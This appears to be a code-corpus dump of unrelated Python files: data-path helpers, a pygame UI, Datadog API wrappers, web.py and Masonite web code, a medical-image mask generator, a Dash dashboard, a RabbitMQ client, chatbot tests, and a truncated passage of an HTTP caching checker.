2013: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2013/data-20181029t000000-structure-20131231t000000.csv',
2014: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2014/data-20181029t000000-structure-20141231t000000.csv',
2015: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2015/data-20181029t000000-structure-20151231t000000.csv',
2016: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2016/data-20181029t000000-structure-20161231t000000.csv',
2017: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2017/data-20181029t000000-structure-20171231t000000.csv',
}
__all__ = ['url',
'url_local_path',
'csv_path_raw',
'csv_path_interim',
'csv_path_processed',
]
PROJECT_ROOT = Path(__file__).parents[1]
IS_WINDOWS = (platform.system() == 'Windows')
# RAR executable
if IS_WINDOWS:
UNPACK_RAR_EXE = str(PROJECT_ROOT / 'bin' / 'unrar.exe')
else:
UNPACK_RAR_EXE = 'unrar'
def url(year: int):
return URL[year]
assert url(2012) == URL[2012]
def make_subfolder(subfolder: str):
"""Return /data/<subfolder> path. Creates subfolders if they do not exist."""
check_subfolder(subfolder)
folder = PROJECT_ROOT / 'data' / subfolder
if not folder.exists():
folder.mkdir(parents=True)
return folder
def check_subfolder(name:str):
if name not in ['external', 'raw', 'interim', 'processed']:
raise ValueError(f"worng subfolder name: {name}")
def url_filename(url):
return url.split('/')[-1]
assert url_filename(URL[2012]) == 'data-20181029t000000-structure-20121231t000000.csv'
def url_local_path(year: int):
return make_subfolder('external') / url_filename(URL[year])
def csv_filename(year: int):
return f'{year}.csv'
def _path_as_string(year, subfolder):
return str(make_subfolder(subfolder) / csv_filename(year))
def csv_path_raw(year):
return _path_as_string(year, 'raw')
def csv_path_interim(year):
return _path_as_string(year, 'interim')
def csv_path_processed(year):
return _path_as_string(year, 'processed')
assert csv_path_raw(2012).endswith('\\data\\raw\\2012.csv')
assert csv_path_interim(2012).endswith('\\data\\interim\\2012.csv')
assert csv_path_processed(2012).endswith('\\data\\processed\\2012.csv')
#def tempfile(filename: str):
# return make_data_path('temp', filename)
|
StarcoderdataPython
|
3558448
|
from argparse import ArgumentParser
from sys import stdin
from mlmorph import Generator, Analyser
def main():
"""Invoke a simple CLI analyser or generator."""
a = ArgumentParser()
a.add_argument('-i', '--input', metavar="INFILE", type=open,
dest="infile", help="source of analysis data")
a.add_argument('-a', '--analyse', action='store_true',
help="Analyse the input file strings")
a.add_argument('-g', '--generate', action='store_true',
help="Generate the input file strings")
a.add_argument('-v', '--verbose', action='store_true',
help="print verbosely while processing")
options = a.parse_args()
if not options.infile:
options.infile = stdin
if options.verbose:
print("reading from", options.infile.name)
analyser = Analyser()
generator = Generator()
for line in options.infile:
line = line.strip()
if not line or line == '':
continue
if options.analyse:
anals = analyser.analyse(line, True)
if not anals:
print(line, "\t?")
for anal in anals:
print(line, "\t", anal[0], "\t", anal[1])
if options.generate:
gens = generator.generate(line, True)
if not gens:
print(line, "\t?")
for gen in gens:
print(line, "\t", gen[0], "\t", gen[1])
print()
exit(0)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
3305205
|
import pygame
from sys import exit
#from KinectTools import PyKinectRuntime
#from KinectTools import PyKinectV2
import ctypes
from Stamina.stamina import stamina
from faceRecognition.Login import login
from faceRecognition.Signup import signup
from utils.utils import scale
from utils.utils import choose,click
class ui(object):
def __init__(self,n):
self.SCREEN_WIDTH= int(2160 / n)
self.SCREEN_HEIGHT= int(3840 / n)
self.n = n
self.start_flag = 0
pygame.init()
self._clock = pygame.time.Clock()
self.screen = pygame.display.set_mode((self.SCREEN_WIDTH, self.SCREEN_HEIGHT),pygame.HWSURFACE | pygame.DOUBLEBUF | pygame.RESIZABLE,32)
self.display_surface = pygame.Surface((self.SCREEN_WIDTH,self.SCREEN_HEIGHT))
pygame.display.set_caption('v0.1')
#self.start = Image("images/poster.png", (0, 0), self.screen)
#self.stat = self.start.image
#self.position = self.start.image.get_rect()
#
# def load_face_images(self):
# self.login =
# self.signup =
#
# def start(self,position):
# # start = Image("images/poster.png",(0,0),self.screen)
# self.start.render(position)
def load_set_images(self):
#self.background = pygame.Surface((1080,1920))
#self.background.fill((255,255,255))
self.zhidao_image = pygame.image.load('images/1.jpeg')
self.zhidao_image = pygame.transform.smoothscale(self.zhidao_image,(int(168 * 5.76 / self.n),int(259 * 5.76 / self.n)))
self.zh = (16*self.SCREEN_WIDTH)/375
self.zz = (189*self.SCREEN_HEIGHT)/667
self.display_surface.blit(self.zhidao_image,(self.zh,self.zz))
self.meiyan_image = pygame.image.load('images/2.jpeg')
self.meiyan_image = pygame.transform.smoothscale(self.meiyan_image, (int(168 * 5.76 / self.n), int(120 * 5.76 /self.n)))
self.mh = (16 * self.SCREEN_WIDTH) / 375
self.mz = (456 * self.SCREEN_HEIGHT) / 667
self.display_surface.blit(self.meiyan_image, (self.mh, self.mz))
self.pinggu_image = pygame.image.load('images/3.jpeg')
self.pinggu_image = pygame.transform.smoothscale(self.pinggu_image, (int(168 * 5.76 /self.n), int(164 * 5.76 / self.n)))
self.ph = (192 * self.SCREEN_WIDTH) / 375
self.pz = (189 * self.SCREEN_HEIGHT) / 667
self.display_surface.blit(self.pinggu_image, (self.ph, self.pz))
self.baogao_image = pygame.image.load('images/4.jpeg')
self.baogao_image = pygame.transform.smoothscale(self.baogao_image, (int(168 * 5.76 /self.n), int(215 * 5.76 / self.n)))
self.bh = (192 * self.SCREEN_WIDTH) / 375
self.bz = (361 * self.SCREEN_HEIGHT) / 667
self.display_surface.blit(self.baogao_image, (self.bh, self.bz))
# self.bh = (192 * self.SCREEN_WIDTH / 375)
# self.bz = (361 * self.SCREEN_HEIGHT / 667)
# self.baogao_image = Image("images/4.jpeg",None,(self.bh,self.bz))
# #self.baogao_image.update()
# self.display_surface.blit(self.baogao_image.image,(self.bh,self.bz))
#
#
# self.meiyan_image = pygame.image.load('images/2.jpg')
# mwidth = (int)(self.meiyan_image.get_width()*1.43/self.n)
# mheight = (int)(self.meiyan_image.get_height()*1.43/self.n)
# self.meiyan_image = pygame.transform.scale(self.meiyan_image,(mwidth,mheight))
# self.screen.blit(self.meiyan_image,[16/375*self.SCREEN_WIDTH,456/667*self.SCREEN_HEIGHT])
#
# self.jiance_image = pygame.image.load('images/3.jpg')
# width = (int)(self.jiance_image.get_width()*1.44/self.n)
# height = (int)(self.jiance_image.get_height()*1.44/self.n)
# self.jiance_image = pygame.transform.scale(self.jiance_image,(width,height))
# self.screen.blit(self.jiance_image,[192/375 * self.SCREEN_WIDTH,189/667*self.SCREEN_HEIGHT])
#
# self.baogao_image = pygame.image.load('images/4.jpg')
# width = (int)(self.baogao_image.get_width()*1.44/self.n)
# height = (int)(self.baogao_image.get_height()*1.44/self.n)
# self.baogao_image = pygame.transform.scale(self.baogao_image,(width,height))
# self.screen.blit(self.baogao_image,[192/375 * self.SCREEN_WIDTH,361/667 *self.SCREEN_HEIGHT])
#
self.logo_image = pygame.image.load('images/logo2.png')
self.logo_image = pygame.transform.smoothscale(self.logo_image,
(int(82 * 5.76 / self.n), int(74 * 5.76 / self.n)))
self.lh = (150 * self.SCREEN_WIDTH) / 375
self.lz = (44 * self.SCREEN_HEIGHT) / 667
self.display_surface.blit(self.logo_image, (self.lh, self.lz))
# width = (int)(41 * 2 * 2 / self.n)
# height = (int)(37 * 2 * 2 / self.n)
# self.logo_image = pygame.transform.scale(self.logo_image,(width,height))
# self.screen.blit(self.logo_image,[172/375* self.SCREEN_WIDTH,44/667 * self.SCREEN_HEIGHT])
# self.menu = pygame.image.load("images/menu.png").convert_alpha()
# mwidth = (int)(self.menu.get_width()*1.43/self.n)
# mheight = (int)(self.menu.get_height()*1.43/self.n)
# self.menu = pygame.transform.scale(self.menu,(mwidth,mheight))
# self.display_surface.blit(self.menu,[0,0])
def change_mode(self):
if click(self.pinggu_image,(self.ph,self.pz)):
print("into2")
return 2
def run(self):
#self.screen.blit(self.display_surface,[0,0])
# self.start.render((0,0))
# h = 0
while self.start_flag == 0:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
exit()
print("set_images...")
self.load_set_images()
self.screen.blit(self.display_surface,(0,0))
if self.change_mode() == 2:
print("kinect will work!")
self.start_flag = 1
pygame.display.update()
self._clock.tick(60)
c = stamina(self.screen,self.n)
c.run()
print("kinect ends")
|
StarcoderdataPython
|
8048704
|
__all__ = [
'InfrastructureApi',
]
class InfrastructureApi(object):
def search(self, query):
"""
Search datadog for hosts and metrics by name. The search *query* can be
faceted to limit the results (e.g. ``"hosts:foo"``, or ``"metrics:bar"``)
or un-faceted, which will return results of all types (e.g. ``"baz"``).
Return a dictionary mapping each queried facet to a list of name
strings.
>>> dog_http_api.search("cassandra")
{ "results": {
"hosts": ["cassandraHostA", "cassandraHostB", ...],
"metrics": ["cassandra.load", "cassandra.requests", ...]
}
}
"""
return self.http_request('GET', '/search', q=query,
response_formatter=lambda x: x['results'],
)
def all_tags(self, source=None):
"""
Get a list of tags for your org and their member hosts.
>>> dog_http_api.all_tags()
[ { 'tag1': [ 'host1', 'host2', ... ] }, ... ]
"""
params = {}
if source:
params['source'] = source
return self.http_request('GET', '/tags/hosts',
response_formatter=lambda x: x['tags'],
**params
)
def host_tags(self, host_id, source=None, by_source=False):
"""
Get a list of tags for the specified host by name or id.
>>> dog_http_api.host_tags('web.example.com')
['web', 'env:production']
>>> dog_http_api.host_tags(1234)
['database', 'env:test']
"""
params = {}
if source:
params['source'] = source
if by_source:
params['by_source'] = 'true'
return self.http_request('GET', '/tags/hosts/' + str(host_id),
response_formatter=lambda x: x['tags'],
**params
)
def add_tags(self, host_id, tags, source=None):
"""add_tags(host_id, [tag1, tag2, ...])
Add one or more tags to a host.
>>> dog_http_api.add_tags(host_id, ['env:test'])
>>> dog_http_api.add_tags(host_id, ['env:test', 'database'])
"""
if isinstance(tags, basestring):
tags = [tags]
body = {
'tags': tags,
}
params = {}
if source:
params['source'] = source
return self.http_request('POST', '/tags/hosts/' + str(host_id), body,
response_formatter=lambda x: x['tags'],
**params
)
def change_tags(self, host_id, tags, source=None):
"""change_tags(host_id, [tag1, tag2, ...])
Replace a host's tags with one or more new tags.
>>> dog_http_api.change_tags(host_id, ['env:test'])
>>> dog_http_api.change_tags(host_id, ['env:test', 'database'])
"""
if isinstance(tags, basestring):
tags = [tags]
body = {
'tags': tags
}
params = {}
if source:
params['source'] = source
return self.http_request('PUT', '/tags/hosts/' + str(host_id), body,
response_formatter=lambda x: x['tags'],
**params
)
def detach_tags(self, host_id, source=None):
"""
Remove all tags from a host.
>>> dog_http_api.detach_tags(123)
"""
params = {}
if source:
params['source'] = source
return self.http_request('DELETE', '/tags/hosts/' + str(host_id),
**params
)
|
StarcoderdataPython
|
4848827
|
<gh_stars>1-10
import web, datetime
db = web.database(dbn='mysql', db='webpy_demo', user='dbuser',pw="<PASSWORD>")
def get_posts():
return db.select('entries', order='id DESC')
def get_post(id):
try:
return db.select('entries', where='id=$id', vars=locals())[0]
except IndexError:
return None
def new_post(title, text):
db.insert('entries', title=title, content=text, posted_on=datetime.datetime.utcnow())
def del_post(id):
db.delete('entries', where="id=$id", vars=locals())
def update_post(id, title, text):
db.update('entries', where="id=$id", vars=locals(),
title=title, content=text)
|
StarcoderdataPython
|
6581038
|
<reponame>3dimaging/DeepLearningCamelyon_II
#!/home/wli/env python3
# -*- coding: utf-8 -*-
"""
Title: convert XML to binary mask
=================================
Created: 10-31-2019
Python-Version: 3.5, 3.6
Description:
------------
This module is used to generate binary mask files from the annotations (XML files).
This module is needed for generating mask files for testing WSIs because the code coming with ASAP showed
errors for mask generation on certain testing WSIs.
Inputs:
*******
xml_folder = '/raida/wjc/CAMELYON16/testing/lesion_annotations'
slide_folder = '/raida/wjc/CAMELYON16/testing/images'
level = 5 : the level of zoom (0 is the highest; 5 is the 32x
downsampled image from level 0).
Output:
*******
result_folder = '/raidb/wli/testing_1219/mask_for_testing_wsi'
Note:
-----
If you need more information about how ElementTree package handle XML file,
please follow the link:
#https://docs.python.org/3/library/xml.etree.elementtree.html
"""
import math
import glob
import pandas as pd
import xml.etree.ElementTree as et
from pandas import DataFrame
import openslide
import numpy as np
import cv2
import matplotlib.pyplot as plt
import logging
import os.path as osp
import sys
sys.path.append('/home/weizhe.li/dldp/utils/logman')
sys.path.append('/home/weizhe.li/dldp/utils')
# setup_logging
import fileman as fm
import logger_management
from logger_management import log_with_template
from logger_management import StreamToLogger
from logger_management import setup_logging
# import multiresolutionimageinterface as mir
# reader = mir.MultiResolutionImageReader()
# mr_image = reader.open('/home/wli/Downloads/tumor_036.tif')
# Ximageorg, Yimageorg = mr_image.getDimensions()
# dims = mr_image.getLevelDimensions(4)
# Ximage = (Ximage+240//2)//240
# Ximage = 4000
# Yimage = (Yimage+240//2)//240
# Yimage = 2000
class mask_generator(object):
"""
The class is used to generate a single mask file (not pyramid) based
on xml file.
"""
def __init__(self, xml_file, level, dims):
"""
variables initialization
:param xml_file:
:param level:
:param dims:
:param result_folder:
"""
self.xml_file = xml_file
self.level = level
self.dims = dims
self.result_folder = result_folder
def convert_xml_df(self):
"""
To convert a xml file to a series of dataframes in a tuple.
:return: df_xml: x, y coordinates
:rtype: dataframe
"""
down_sample = 2**self.level
parseXML = et.parse(self.xml_file)
root = parseXML.getroot()
dfcols = ['Name', 'Order', 'X', 'Y']
df_xml = pd.DataFrame(columns=dfcols)
for child in root.iter('Annotation'):
for coordinate in child.iter('Coordinate'):
Name = child.attrib.get('Name')
Order = coordinate.attrib.get('Order')
X_coord = float(coordinate.attrib.get('X'))
X_coord = X_coord//down_sample
#X_coord = X_coord/down_sample
Y_coord = float(coordinate.attrib.get('Y'))
Y_coord = Y_coord//down_sample
#Y_coord = Y_coord/down_sample
df_xml = df_xml.append(pd.Series(
[Name, Order, X_coord, Y_coord], index=dfcols),
ignore_index=True) # type: DataFrame
df_xml = pd.DataFrame(df_xml)
print('redundent xml:', df_xml.shape)
return df_xml
# x_values = list(annotations['X'].get_values())
# y_values = list(annotations['Y'].get_values())
# xy = list(zip(x_values,y_values))
def points_collection(self, annotations):
"""
remove the duplicated coordinates due to the down_sampling
:param duplicate:
:return: list with no duplicates
:rtype: list
"""
final_name_list = list(annotations['Name'].unique())
coxy = [[] for x in range(len(final_name_list))]
for index, n in enumerate(final_name_list):
newx = annotations[annotations['Name'] == n]['X']
newy = annotations[annotations['Name'] == n]['Y']
newxy = list(zip(newx, newy))
coxy[index] = np.array(newxy, dtype=np.int32)
return (coxy, final_name_list)
def mask_gen(self, coxy, result_folder):
"""
generate a binary mask file
:param final_list: the down-sampled annotation
:type final_list: list
:param result_folder:
:type result_folder:str
:return: mask file
:rtype: tif file
"""
# image = cv2.imread('/home/wli/Downloads/tumor_036.xml', -1)
canvas = np.zeros((int(self.dims[1]//2**self.level), int(self.dims[0]//2**self.level)), np.uint8)
# canvas = np.zeros((int(dims[1]/32), int(dims[0]/32)), np.uint8)
# tile =mr_image.getUCharPatch(0, 0, dims[0], dims[1], 4)
# canvas = np.zeros((Ximage, Yimage, 3), np.uint8) # fix the division
# coords = np.array([xy], dtype=np.int32)
# cv2.drawContours(canvas, [coords],-1, (0,255,0), -1)
# cv2.drawContours(canvas, coxy, -1, (255, 255, 255), 10)
# cv2.drawContours(canvas, coxy, -1, (255, 255, 255), CV_FILLED)
cv2.fillPoly(canvas, pts=coxy, color=(255, 255, 255))
# cv2.polylines(canvas, coxy, isClosed=True, color=(255,255,255),
# thickness=5)
cv2.imwrite('%s/%s.png' % (result_folder,
osp.splitext(osp.basename(self.xml_file))[0]), canvas)
# cv2.imshow("tile", tile);cv2.waitKey();cv2.destroyAllWindows()
# cv2.fillConvexPoly(mask, coords,1)
# mask = mask.astype(np.bool)
# output = np.zeros_like(image)
# output[mask] = image[mask]
# cv2.imshow('image',output)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
class lesion_count(mask_generator):
def __init__(self):
super().__init__
def gen_lesion_table(self, coxy, final_name_list):
lesion_total = []
for coord, lesion_name in list(zip(coxy, contour_names)):
M = cv2.moments(coord)
cX = int(M["m10"] / M["m00"])
cY = int(M["m01"] / M["m00"])
lesion_total.append([lesion_name, (cX, cY), cv2.contourArea(coord)])
return lesion_total
if __name__ == '__main__':
# setup_logging
module_name = sys.modules['__main__'].__file__
log_template_path = '/home/weizhe.li/dldp/utils/logman/logging_config.yaml'
# The log template is also inculded in this package.
# log_template_path = '.../dldp/utils/logman/logging_config.yaml'
logger = log_with_template(log_template_path, module_name)
# xml_folder = '/home/wzli/Downloads/CAMELYON16/testing/
# lesion_annotations/'
# xml_folder = '/home/wzli/Downloads/CAMELYON16/training/
# lesion_annotations_training/'
xml_folder = '/projects01/wxc4/wli/CAMELYON16/lesion_annotations'
xml_paths = fm.list_file_in_dir_II(xml_folder, 'xml')
logger.debug('the fist xml file is %s' % xml_paths[0])
# xml_paths = glob.glob(osp.join(xml_folder, '*.xml'))
# xml_paths.sort()
# slide_folder = '/home/wzli/Downloads/CAMELYON16/testing/images/'
slide_folder = '/projects01/wxc4/CAMELYON16-training/tumor'
result_folder = '/projects01/wxc4/wli/CAMELYON16/lesion_counts'
created_folder = fm.creat_folder('', result_folder)
# slide_paths = glob.glob(osp.join(slide_folder, '*.tif'))
level = 5
############################lesion count#######################################
lesion_total = []
col_names = ['slide_name', 'lesion_name', 'centroid', 'area']
for xml_file in xml_paths:
slide_name = osp.basename(xml_file.replace('.xml', '.tif'))
slide_path = osp.join(slide_folder, slide_name)
wsi_image = openslide.open_slide(slide_path)
dims = wsi_image.dimensions
mask_gen = mask_generator(xml_file, level, dims)
annotations = mask_gen.convert_xml_df()
final_annotations, _ = mask_gen.points_collection(annotations)
# mask_gen.mask_gen(final_annotations, reult_folder)
lesion_stat = lesion_count(xml_file, level, dims)
annotations = lesion_stat.convert_xml_df()
final_annotations, lesion_names = lesion_stat.points_collection(annotations)
slide_lesions = lesion_stat.gen_lesion_table(final_annotations, lesion_names)
lesion_total.append(slide_lesions)
df_lesion_stat = pd.DataFrame(lesion_total, columns=col_names)
df_lesion_stat.to_csv(result_folder)
|
StarcoderdataPython
|
12801785
|
import os
import shutil
from pathlib import Path
import dash
from dash import html
from dash import dcc
class DashboardObject:
def __init__(self, title, description = "", dependencies = [], meta = None):
self.title = title
self.description = description
self.dependencies = dependencies
self.meta = meta
def build(self, path):
for dep in self.dependencies:
shutil.copyfile(dep, path.joinpath(dep.name))
def render(self, dashboard):
return html.Div(children=[
html.H2(self.title),
dcc.Markdown(self.description),
html.Pre(self.meta["env"]["uname"]),
self._render(dashboard)
], className="dashboard-object")
def _render(self, dashboard):
pass
class Graph(DashboardObject):
def __init__(self, figure, title, description = "", meta = None):
super().__init__(title, description, meta=meta)
figure.update_layout(template="plotly_dark")
self._figure = figure
def _render(self, dashboard):
return dcc.Graph(figure=self._figure)
class Component(DashboardObject):
def __init__(self, component, title, description = "", dependencies = []):
super().__init__(title, description, dependencies)
self._component = component
def _render(self, dashboard):
return self._component
class Image(DashboardObject):
def __init__(self, path, title, description = ""):
super().__init__(title, description)
self.path = Path(path)
self.dependencies.append(self.path)
def _render(self, dashboard):
return html.Img(src=dashboard.asset(self.path.name))
class Dashboard:
def __init__(self, title):
self.title = title
self.asset_dir = Path(os.environ["OVE_PROJECT_DIR"]).joinpath("dashboard/assets")
self.figure_dir = self.asset_dir.joinpath("figures")
self._built = False
self._objects = []
self._app = dash.Dash(__name__, assets_folder=self.asset_dir.absolute())
def add(self, obj):
self._objects.append(obj)
return self
def build(self):
self.figure_dir.mkdir(parents = True, exist_ok = True)
for obj in self._objects:
obj.build(self.figure_dir)
self._built = True
return self
def render(self):
return html.Main([obj.render(self) for obj in self._objects])
def serve(self):
assert(self._built)
self._app.layout = html.Div(children=[
html.H1(["WARA-SW TEP Dashboard: ", html.B(self.title)]),
self.render()
])
self._app.run_server(debug=True)
def asset(self, path):
return self._app.get_asset_url(str(Path("figures").joinpath(path)))
|
StarcoderdataPython
|
1846763
|
<reponame>nilsreichert/core
"""The RegisterController Module."""
from config import auth
from masonite.auth import Auth
from masonite.helpers import password as bcrypt_password
from masonite.request import Request
from masonite.view import View
from masonite.auth import MustVerifyEmail
from masonite.managers import MailManager
class RegisterController:
"""The RegisterController class."""
def __init__(self):
"""The RegisterController Constructor."""
pass
def show(self, request: Request, view: View):
"""Show the registration page.
Arguments:
Request {masonite.request.request} -- The Masonite request class.
Returns:
masonite.view.View -- The Masonite View class.
"""
return view.render('auth/register', {'app': request.app().make('Application'), 'Auth': Auth(request)})
def store(self, request: Request, mail_manager: MailManager):
"""Register the user with the database.
Arguments:
request {masonite.request.Request} -- The Masonite request class.
Returns:
masonite.request.Request -- The Masonite request class.
"""
user = auth.AUTH['model'].create(
name=request.input('name'),
password=<PASSWORD>(request.input('password')),
email=request.input('email'),
)
if isinstance(user, MustVerifyEmail):
user.verify_email(mail_manager, request)
# Login the user
if Auth(request).login(request.input(auth.AUTH['model'].__auth__), request.input('password')):
# Redirect to the homepage
return request.redirect('/home')
# Login failed. Redirect to the register page.
return request.redirect('/register')
|
StarcoderdataPython
|
8164010
|
<gh_stars>0
#!/usr/bin/env python
# Title: UAV client
# Description: Randomly generates peoples poses and sends them to the RabbitMQ server
# Engineer: <NAME>
# Email: <EMAIL>
# Lab: Autonomous Controls Lab, The University of Texas at San Antonio
######### Libraries ###################
import numpy as np
import random
import pika
import time
import matplotlib.pyplot as plt
import yaml
import json
### Read config parameters for RabbitMQ
with open('config.yaml') as f:
config = yaml.safe_load(f)
hostname = config['hostname']
username = config['username']
password = config['password']
port = config['port']
credentials = pika.PlainCredentials(username, password)
connection = None
colors = ['b','g','y','k','c','r']
auction_count = 0
curr_num_auction = 0
boat_ids = []
curr_time = None
# Receive messages from UAVs and publish to Clustering
def callback(ch, method, properties, body):
global auction_count, curr_num_auction, boat_ids, curr_time
auction_info = json.loads(body.decode('utf-8'))
if auction_info['boat_id'] not in boat_ids:
boat_ids.append(auction_info['boat_id'])
fig = plt.gcf()
ax = fig.gca()
plt.scatter(float(auction_info['x_position']),float(auction_info['y_position']),c=colors[boat_ids.index(auction_info['boat_id'])%len(colors)],s=5)
circle1=plt.Circle((float(auction_info['x_position']),float(auction_info['y_position'])),color=colors[boat_ids.index(auction_info['boat_id'])%len(colors)], radius=20,fill=False)
plt.ylim([-300,300])
plt.xlim([-300,300])
ax.add_artist(circle1)
print(curr_time, auction_info['time_stamp'])
if curr_time != auction_info['time_stamp']:
curr_time = auction_info['time_stamp']
plt.draw()
plt.pause(0.1)
fig.clear()
if __name__ == '__main__':
# Establish incoming connection from Speed Clusters
connection_in = pika.BlockingConnection(pika.ConnectionParameters(host=hostname, credentials=credentials, port=port))
channel_in = connection_in.channel()
channel_in.exchange_declare(exchange='auctioning_info', exchange_type='direct')
result_in = channel_in.queue_declare(exclusive=True)
queue_in_name = result_in.method.queue
channel_in.queue_bind(exchange='auctioning_info',queue=queue_in_name,routing_key='key_auctioning_info')
# Indicate queue readiness
print(' [*] Waiting for messages. To exit, press CTRL+C')
# Consumption configuration
channel_in.basic_consume(callback,queue=queue_in_name,no_ack=False)
# Begin consuming from UAVs
plt.draw()
plt.pause(0.01)
channel_in.start_consuming()
|
StarcoderdataPython
|
60253
|
#!/usr/bin/python
import sqlite3
uId = 4
con = sqlite3.connect('ydb.db')
with con:
cur = con.cursor()
cur.execute("SELECT name, price FROM cars WHERE Id=:Id", {"Id": uId})
row = cur.fetchone()
print(f"{row[0]}, {row[1]}")
|
StarcoderdataPython
|
3503554
|
<filename>tests/test_dynamic_models.py
"""Trial runs on DynamicBot with the TestData Dataset."""
import time
import logging
import unittest
import numpy as np
import tensorflow as tf
import pydoc
from pydoc import locate
import data
import chatbot
from utils import io_utils, bot_freezer
from tests.utils import *
class TestDynamicModels(unittest.TestCase):
def setUp(self):
tf.logging.set_verbosity('ERROR')
def test_create_bot(self):
"""Ensure bot constructor is error-free."""
logging.info("Creating bot . . . ")
bot = create_bot()
self.assertIsInstance(bot, chatbot.DynamicBot)
def test_save_bot(self):
"""Ensure we can save to bot ckpt dir."""
bot = create_bot()
self.assertIsInstance(bot, chatbot.DynamicBot)
def test_save_bot(self):
"""Ensure teardown operations are working."""
bot = create_bot()
self.assertIsInstance(bot, chatbot.DynamicBot)
logging.info("Closing bot . . . ")
bot.close()
def test_train(self):
"""Simulate a brief training session."""
flags = TEST_FLAGS
flags = flags._replace(model_params=dict(
**flags.model_params,
reset_model=True,
steps_per_ckpt=10))
bot = create_bot(flags)
self._quick_train(bot)
def test_base_methods(self):
"""Call each method in chatbot._models.Model, checking for errors."""
bot = create_bot()
logging.info('Calling bot.save() . . . ')
bot.save()
logging.info('Calling bot.freeze() . . . ')
bot.freeze()
logging.info('Calling bot.close() . . . ')
bot.close()
def test_manual_freeze(self):
"""Make sure we can freeze the bot, unfreeze, and still chat."""
# ================================================
# 1. Create & train bot.
# ================================================
flags = TEST_FLAGS
flags = flags._replace(model_params=dict(
ckpt_dir=os.path.join(TEST_DIR, 'out'),
reset_model=True,
steps_per_ckpt=20,
max_steps=40))
bot = create_bot(flags)
self.assertEqual(bot.reset_model, True)
# Simulate small train sesh on bot.
bot.train()
# ================================================
# 2. Recreate a chattable bot.
# ================================================
# Recreate bot from scratch with decode set to true.
logging.info("Resetting default graph . . . ")
tf.reset_default_graph()
flags = flags._replace(model_params={
**flags.model_params,
'reset_model': False,
'decode': True,
'max_steps': 100,
'steps_per_ckpt': 50})
self.assertTrue(flags.model_params.get('decode'))
bot = create_bot(flags)
self.assertTrue(bot.is_chatting)
self.assertTrue(bot.decode)
print("Testing quick chat sesh . . . ")
config = io_utils.parse_config(flags=flags)
dataset_class = pydoc.locate(config['dataset']) \
or getattr(data, config['dataset'])
dataset = dataset_class(config['dataset_params'])
test_input = "How's it going?"
encoder_inputs = io_utils.sentence_to_token_ids(
tf.compat.as_bytes(test_input),
dataset.word_to_idx)
encoder_inputs = np.array([encoder_inputs[::-1]])
bot.pipeline._feed_dict = {
bot.pipeline.user_input: encoder_inputs}
# Get output sentence from the chatbot.
_, _, response = bot.step(forward_only=True)
print("Robot:", dataset.as_words(response[0][:-1]))
# ================================================
# 3. Freeze the chattable bot.
# ================================================
logging.info("Calling bot.freeze() . . . ")
bot.freeze()
# ================================================
# 4. Try to unfreeze and use it.
# ================================================
logging.info("Resetting default graph . . . ")
tf.reset_default_graph()
logging.info("Importing frozen graph into default . . . ")
frozen_graph = bot_freezer.load_graph(bot.ckpt_dir)
logging.info("Extracting input/output tensors.")
tensors, frozen_graph = bot_freezer.unfreeze_bot(bot.ckpt_dir)
self.assertIsNotNone(tensors['inputs'])
self.assertIsNotNone(tensors['outputs'])
with tf.Session(graph=frozen_graph) as sess:
raw_input = "How's it going?"
encoder_inputs = io_utils.sentence_to_token_ids(
tf.compat.as_bytes(raw_input),
dataset.word_to_idx)
encoder_inputs = np.array([encoder_inputs[::-1]])
feed_dict = {tensors['inputs'].name: encoder_inputs}
response = sess.run(tensors['outputs'], feed_dict=feed_dict)
logging.info('Reponse: %s', response)
def test_memorize(self):
"""Train a bot to memorize (overfit) the small test data, and
show its responses to all train inputs when done.
"""
flags = TEST_FLAGS
flags = flags._replace(model_params=dict(
ckpt_dir='out/test_data',
reset_model=True,
steps_per_ckpt=300,
state_size=128,
embed_size=32,
max_steps=300))
flags = flags._replace(dataset_params=dict(
max_seq_len=20,
data_dir=TEST_DATA_DIR))
print('TEST_FLAGS', flags.dataset)
bot, dataset = create_bot(flags=flags, return_dataset=True)
bot.train()
# Recreate bot (its session is automatically closed after training).
flags = flags._replace(model_params={
**flags.model_params,
'reset_model': False,
'decode': True})
bot, dataset = create_bot(flags, return_dataset=True)
for inp_sent, resp_sent in dataset.pairs_generator():
print('\nHuman:', inp_sent)
response = bot.respond(inp_sent)
if response == resp_sent:
print('Robot: %s\nCorrect!' % response)
else:
print('Robot: %s\nExpected: %s' % (
response, resp_sent))
def _quick_train(self, bot, num_iter=10):
"""Quickly train manually on some test data."""
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=bot.sess, coord=coord)
for _ in range(num_iter):
bot.step()
summaries, loss, _ = bot.step()
bot.save(summaries=summaries)
coord.request_stop()
coord.join(threads)
|
StarcoderdataPython
|
8054022
|
#!/usr/bin/env python
"""
Cacheability checking function.
"""
from redbot.formatter import relative_time, f_num
from redbot.message import HttpRequest, HttpResponse
from redbot.speak import Note, categories, levels
### configuration
cacheable_methods = ['GET']
heuristic_cacheable_status = ['200', '203', '206', '300', '301', '410']
max_clock_skew = 5 # seconds
def checkCaching(response: HttpResponse, request: HttpRequest=None) -> None:
"Examine HTTP caching characteristics."
# get header values
lm_hdr = response.parsed_headers.get('last-modified', None)
date_hdr = response.parsed_headers.get('date', None)
expires_hdr = response.parsed_headers.get('expires', None)
etag_hdr = response.parsed_headers.get('etag', None)
age_hdr = response.parsed_headers.get('age', None)
cc_set = response.parsed_headers.get('cache-control', [])
cc_list = [k for (k, v) in cc_set]
cc_dict = dict(cc_set)
cc_keys = list(cc_dict.keys())
# Last-Modified
if lm_hdr:
serv_date = date_hdr or response.start_time
if lm_hdr > serv_date:
response.add_note('header-last-modified', LM_FUTURE)
else:
response.add_note('header-last-modified', LM_PRESENT,
last_modified_string=relative_time(lm_hdr, serv_date))
# known Cache-Control directives that don't allow duplicates
known_cc = ["max-age", "no-store", "s-maxage", "public",
"private", "pre-check", "post-check",
"stale-while-revalidate", "stale-if-error"]
# check for mis-capitalised directives /
# assure there aren't any dup directives with different values
for cc in cc_keys:
if cc.lower() in known_cc and cc != cc.lower():
response.add_note('header-cache-control', CC_MISCAP,
cc_lower=cc.lower(), cc=cc)
if cc in known_cc and cc_list.count(cc) > 1:
